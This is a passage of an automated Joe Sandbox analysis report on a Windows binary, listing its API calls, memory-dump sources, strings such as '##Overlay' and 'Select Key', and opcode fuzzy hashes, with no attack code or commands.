                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417721D
                                                                                                                                                                            • Part of subcall function 00007FF67418B570: memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF6741771EA), ref: 00007FF67418B652
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417726B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
                                                                                                                                                                          • String ID: ", "$: "
                                                                                                                                                                          • API String ID: 2077005984-747220369
                                                                                                                                                                          • Opcode ID: 0d415203c43ebf0ecabdc822e5924af98a50cdb8722a42b5ae2175494e1faadf
                                                                                                                                                                          • Instruction ID: 6c57393a36fb671df892f2b8889d4a104d0afe8b03edd9ee807fc244a7c46276
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d415203c43ebf0ecabdc822e5924af98a50cdb8722a42b5ae2175494e1faadf
                                                                                                                                                                          • Instruction Fuzzy Hash: 29618063B28B40C9EB00EF65D5883BD2366EB49B98F004535EE6D57B99DF38E151C380
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
                                                                                                                                                                          • Instruction ID: 3c4d665a73f97be3e68f29f5a0af6bf8d54dfd4755f47382ddc001ef248d70cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
                                                                                                                                                                          • Instruction Fuzzy Hash: 2441E532A2AB82C6EA55AF65D49827877A0FF44F80F499535CA0DC3355EF3DE981CB40
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA31
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA5A
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA83
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BAB8
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BAE1
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BB10
                                                                                                                                                                            • Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415BB94
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741412CD
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741412F2
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674141314
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674141336
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674141358
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414137A
                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414139C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: f5411cd00e002b590423fa21a25d72b24b8906f5c6ce1ce41fde82a80d96abb8
                                                                                                                                                                          • Instruction ID: c6ef0a9b19b00459cd3fdc5095f776b67319c75e38daaeeffcb136a6a0945c03
                                                                                                                                                                          • Opcode Fuzzy Hash: f5411cd00e002b590423fa21a25d72b24b8906f5c6ce1ce41fde82a80d96abb8
                                                                                                                                                                          • Instruction Fuzzy Hash: 95314922A2AB82C6FE95AF56D4CC73823A0FF45F85F295035C90DC3761DF2DA8408B50
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$free$malloc
                                                                                                                                                                          • String ID: ##Overlay
                                                                                                                                                                          • API String ID: 1393892039-3248624929
                                                                                                                                                                          • Opcode ID: 2eaba876ed650407fe871e7cce812adf08c009d53d860509aa5007c2e7fa2f21
                                                                                                                                                                          • Instruction ID: ed589ea1f10d94be1e801b2f310a7cf1d646567de90fd8def47ddd0e22494de8
                                                                                                                                                                          • Opcode Fuzzy Hash: 2eaba876ed650407fe871e7cce812adf08c009d53d860509aa5007c2e7fa2f21
                                                                                                                                                                          • Instruction Fuzzy Hash: B222E272515BC1C9D310DF29E8841D877A8F745F68FAC433AEAA40B398DF34A1A1C768
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                          • Opcode ID: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
                                                                                                                                                                          • Instruction ID: 81cc9926496a40cb6bc1cce7f1a1ae4d8c23c29271468ef9eb3b05861c91b2d5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B314733A2AA85C6FE95AF11D4882B867A0FF85F81F485535C90EC3764DF2DE480CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418951B
                                                                                                                                                                          • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF67418953A
                                                                                                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418956C
                                                                                                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189587
                                                                                                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6741895D3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1830095303-0
                                                                                                                                                                          • Opcode ID: ebc21684d6296c0a684840035bb16ef733088d37182bbdd14bbd2b4e156afb02
                                                                                                                                                                          • Instruction ID: 48cc619c929946a6f50138bd052314f7a11e978f01e4cd4c504ff2934fc7924c
                                                                                                                                                                          • Opcode Fuzzy Hash: ebc21684d6296c0a684840035bb16ef733088d37182bbdd14bbd2b4e156afb02
                                                                                                                                                                          • Instruction Fuzzy Hash: F9315673615B82C6EB50DF29EA9832D7BA4FB86B89F048131CA4D83724CF39D166C740
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6741887A3
                                                                                                                                                                          • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6741887C2
                                                                                                                                                                          • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6741887F4
                                                                                                                                                                          • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF67418880F
                                                                                                                                                                            • Part of subcall function 00007FF674189CE0: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF674189D1A
                                                                                                                                                                            • Part of subcall function 00007FF674189CE0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189D37
                                                                                                                                                                            • Part of subcall function 00007FF674189CE0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674189D60
                                                                                                                                                                            • Part of subcall function 00007FF674189CE0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF674189DAB
                                                                                                                                                                            • Part of subcall function 00007FF674189CE0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF674189DC0
                                                                                                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF67418885B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2682282330-0
                                                                                                                                                                          • Opcode ID: 1f806dbc833b1be96441531daa2d869a703e86350570aac430166f2c19c06d70
                                                                                                                                                                          • Instruction ID: 514c640a48b935b704895674458ab2b99eb9ea884195d886b17bc10fc7bd0b17
                                                                                                                                                                          • Opcode Fuzzy Hash: 1f806dbc833b1be96441531daa2d869a703e86350570aac430166f2c19c06d70
                                                                                                                                                                          • Instruction Fuzzy Hash: D9212832618B81C6EB50DF25F89832A7BA4FB49B88F048135DA8E83B24CF3ED105C740
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: NPC
                                                                                                                                                                          • API String ID: 2054765191-3492492454
                                                                                                                                                                          • Opcode ID: 1d1846f9ffca4b307175c9f2643c68ed5cb1b41a4df8cf64fe8c791ccb5bec0a
                                                                                                                                                                          • Instruction ID: 63661d866366567a1a4b32dcfb287232eb4ce24b96bf735b0595b4977ee7b960
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d1846f9ffca4b307175c9f2643c68ed5cb1b41a4df8cf64fe8c791ccb5bec0a
                                                                                                                                                                          • Instruction Fuzzy Hash: D8619773B29781DAEB10DF64E4842AD33A0EB44BA8F408625EA5D87B98DF38D255C740
                                                                                                                                                                          APIs
                                                                                                                                                                          • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF674176BB5
                                                                                                                                                                            • Part of subcall function 00007FF67418D9C8: MultiByteToWideChar.KERNEL32 ref: 00007FF67418D9E4
                                                                                                                                                                            • Part of subcall function 00007FF67418D9C8: GetLastError.KERNEL32 ref: 00007FF67418D9F2
                                                                                                                                                                          • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF674176C61
                                                                                                                                                                            • Part of subcall function 00007FF67418B3B0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B4B3
                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674176D0B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWide_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                          • API String ID: 882635279-410509341
                                                                                                                                                                          • Opcode ID: 3d69ea3ab618340370d6e28049371fd42f3692cda36b7f4400f3fb1210120398
                                                                                                                                                                          • Instruction ID: 1732665dca56f797f56c3c196e9d60fe07d22b863c839e1fdbc70bfaa051a302
                                                                                                                                                                          • Opcode Fuzzy Hash: 3d69ea3ab618340370d6e28049371fd42f3692cda36b7f4400f3fb1210120398
                                                                                                                                                                          • Instruction Fuzzy Hash: F941CCA2A28B86C5EB19AF26E58867D36A5EB48FD8F144031DE4D87745EF3CE491C340
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: Press Key$Select Key
                                                                                                                                                                          • API String ID: 2430190256-2074042277
                                                                                                                                                                          • Opcode ID: d51f657d3376c4c2540fc23bc878254aaa10134209f360cf4e1ccfa104575fbb
                                                                                                                                                                          • Instruction ID: b3a1e1bd988fdadcbcf550daaef8ead74041a1eb34751d5ca4e27d2553e291bf
                                                                                                                                                                          • Opcode Fuzzy Hash: d51f657d3376c4c2540fc23bc878254aaa10134209f360cf4e1ccfa104575fbb
                                                                                                                                                                          • Instruction Fuzzy Hash: AE31D363E3C682C1EB10EB14E4C837A6761EB857E4F145235EA9E86AD9DF2DD084C700
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Context$CompositionReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 244372355-3916222277
                                                                                                                                                                          • Opcode ID: 080a81034cbf3d3149e6f6bc5fc97ca55129f1cc00b3034f962431ea279a0ee6
                                                                                                                                                                          • Instruction ID: 7986697a02d5902de607d6f25af5b5701b86192d54ad7d962b86de0a9346a382
                                                                                                                                                                          • Opcode Fuzzy Hash: 080a81034cbf3d3149e6f6bc5fc97ca55129f1cc00b3034f962431ea279a0ee6
                                                                                                                                                                          • Instruction Fuzzy Hash: 65012C37A19B81C6EA60AB16B999279B7A0FB8CBD4F084135DE8D87755EF3CD4448B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                          • String ID: %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                          • API String ID: 3056473165-830562872
                                                                                                                                                                          • Opcode ID: 684e527e8d802f962bd2f23cf025675af8f6021cc4df3825c0dc6ff2fd68eb91
                                                                                                                                                                          • Instruction ID: 1eb89f394ee091dfa2ab3916fe6e18eec3282e46e2a6cd3114c42457d9e20f26
                                                                                                                                                                          • Opcode Fuzzy Hash: 684e527e8d802f962bd2f23cf025675af8f6021cc4df3825c0dc6ff2fd68eb91
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E32B273A28685DBD719DB3AC5842F8B7A0FB59798F048735DB2997291DF38B460CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
